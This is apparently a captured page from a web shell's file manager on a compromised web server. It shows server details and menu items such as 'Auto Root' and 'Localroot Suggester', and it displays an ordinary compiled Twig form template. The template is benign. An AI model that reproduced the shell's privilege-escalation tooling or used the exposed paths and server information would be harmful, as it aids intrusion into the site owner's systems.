Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
var /
cache /
.!!QgY /
twig /
cc /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
cc06f042847c7cf4270e06a3f115c0a2.php
10.55
KB
-rwxrwxr-x
2026-05-18 12:54
Save
Rename
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\CoreExtension; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; use Twig\TemplateWrapper; /* @Content/Form/form.completed.edit.html.twig */ class __TwigTemplate_176a92c8d7484e814447c35f483ffb2e extends Template { private Source $source; /** * @var array<string, Template> */ private array $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->parent = false; $this->blocks = [ ]; } protected function doDisplay(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 1 if ((($context["errorMessage"] ?? null) != "")) { // line 2 yield " <div class=\"alert alert-error\"> "; // line 3 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(($context["errorMessage"] ?? null), "html", null, true); yield " </div> "; } // line 6 $context['_parent'] = $context; $context['_seq'] = CoreExtension::ensureTraversable(($context["formItemsEdit"] ?? null)); foreach ($context['_seq'] as $context["_key"] => $context["formItem"]) { // line 7 yield " "; if (((CoreExtension::getAttribute($this->env, $this->source, $context["formItem"], "widget_name", [], "any", false, false, false, 7) == "paragraph") || (CoreExtension::getAttribute($this->env, $this->source, $context["formItem"], "widget_name", [], "any", false, false, false, 7) == "heading"))) { // line 8 yield " "; if ((CoreExtension::getAttribute($this->env, $this->source, $context["formItem"], "widget_name", [], "any", false, false, false, 8) == "heading")) { // line 9 yield " <h5>"; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->urlDecode(CoreExtension::getAttribute($this->env, $this->source, $context["formItem"], "prompt", [], "any", false, false, false, 9)), "html", null, true); yield "</h5> "; } else { // line 11 yield " <p>"; yield Twig\Extension\CoreExtension::nl2br($this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->urlDecode(CoreExtension::getAttribute($this->env, $this->source, $context["formItem"], "description", [], "any", false, false, false, 11)), "html", null, true)); yield "</p> "; } // line 13 yield " "; } else { // line 14 yield " <div class=\"form-group row\" "; if ((CoreExtension::getAttribute($this->env, $this->source, $context["formItem"], "description", [], "any", false, false, false, 14) != "")) { yield " data-toggle=\"popover\" data-content=\""; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->urlDecode(CoreExtension::getAttribute($this->env, $this->source, $context["formItem"], "description", [], "any", false, false, false, 14)), "html", null, true); yield "\" title=\""; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->urlDecode(CoreExtension::getAttribute($this->env, $this->source, $context["formItem"], "prompt", [], "any", false, false, false, 14)), "html", null, true); yield "\""; } yield "> <div class=\"col-sm-12 col-lg-3 formLabel\"> <label for=\"some_form_element_"; // line 16 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, $context["formItem"], "id", [], "any", false, false, false, 16), "html", null, true); yield "\">"; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->urlDecode(CoreExtension::getAttribute($this->env, $this->source, $context["formItem"], "prompt", [], "any", false, false, false, 16)), "html", null, true); yield "</label> </div> <div class=\"col-sm-12 col-lg-9 formPrompt\"> "; // line 19 if (CoreExtension::getAttribute($this->env, $this->source, $context["formItem"], "widget_id", [], "any", true, true, false, 19)) { // line 20 yield " "; yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, ($context["formCompletedFormEdit"] ?? null), CoreExtension::getAttribute($this->env, $this->source, $context["formItem"], "widget_id", [], "any", false, false, false, 20), [], "any", false, false, false, 20), 'widget'); yield " "; // line 21 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, ($context["formCompletedFormEdit"] ?? null), CoreExtension::getAttribute($this->env, $this->source, $context["formItem"], "widget_id", [], "any", false, false, false, 21), [], "any", false, false, false, 21), 'errors'); yield " "; } // line 23 yield " </div> </div> "; } } $_parent = $context['_parent']; unset($context['_seq'], $context['_key'], $context['formItem'], $context['_parent']); $context = array_intersect_key($context, $_parent) + $_parent; // line 27 yield " "; // line 28 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(($context["formCompletedFormEdit"] ?? null), 'rest'); yield " <div class=\"row form-actions formActions\"> <a class=\"btn btn-primary\" id=\"rsvpEditFormSave\">"; // line 31 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("Save"), "html", null, true); yield "</a> </div> <script language=\"Javascript\"> \$(document).ready(function () { "; // line 38 yield " \$('[data-toggle=\"popover\"]').popover({placement: 'top', trigger: 'hover'}); \$('select').select2(); "; // line 41 yield " \$(\".datepicker\").datepicker({ dateFormat: 'dd-mm-yy', changeMonth: true, changeYear: true }); \$(\".datetimepicker\").datetimepicker({ format: 'Y-m-d H:i', dateFormat: 'Y-m-d', timeFormat: 'HH:mm', changeMonth: true, changeYear: true, changeTime: true }); \$('.timepicker').timepicker(); \$('#rsvpEditFormSave').click(function () { elements = \$('#eventEditMain input, textarea, select'); postElements = new Object(); for (var eCnt = 0; eCnt < elements.length; eCnt++) { var elementName = \$(elements[eCnt]).attr('name'); if (typeof elementName != 'undefined' && elementName.indexOf('contentbundle_formcompletedtype_edit') > 0) { if (\$(elements[eCnt]).val() != null && \$(elements[eCnt]).val() != '') { postElements[elementName] = \$(elements[eCnt]).val(); } } } //for \$('#modalBodyEdit_"; // line 74 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, ($context["userList"] ?? null), "id", [], "any", false, false, false, 74), "html", null, true); yield "').html('Updating...'); \$.post('"; // line 76 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['Symfony\Bridge\Twig\Extension\RoutingExtension']->getPath("content_form_completed_edit", ["formId" => CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "id", [], "any", false, false, false, 76), "userListId" => CoreExtension::getAttribute($this->env, $this->source, ($context["userList"] ?? null), "id", [], "any", false, false, false, 76)]), "html", null, true); yield "', postElements).done(function (data) { \$('#modalBodyEdit_"; // line 77 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, ($context["userList"] ?? null), "id", [], "any", false, false, false, 77), "html", null, true); yield "').html(data); }); return false; }); }); </script> "; yield from []; } /** * @codeCoverageIgnore */ public function getTemplateName(): string { return "@Content/Form/form.completed.edit.html.twig"; } /** * @codeCoverageIgnore */ public function isTraitable(): bool { return false; } /** * @codeCoverageIgnore */ public function getDebugInfo(): array { return array ( 185 => 77, 181 => 76, 176 => 74, 141 => 41, 137 => 38, 128 => 31, 122 => 28, 119 => 27, 110 => 23, 105 => 21, 100 => 20, 98 => 19, 90 => 16, 78 => 14, 75 => 13, 69 => 11, 63 => 9, 60 => 8, 57 => 7, 53 => 6, 47 => 3, 44 => 2, 42 => 1,); } public function getSourceContext(): Source { return new Source("", "@Content/Form/form.completed.edit.html.twig", "/var/www/v3.cesa.co.za/src/ContentBundle/Resources/views/Form/form.completed.edit.html.twig"); } }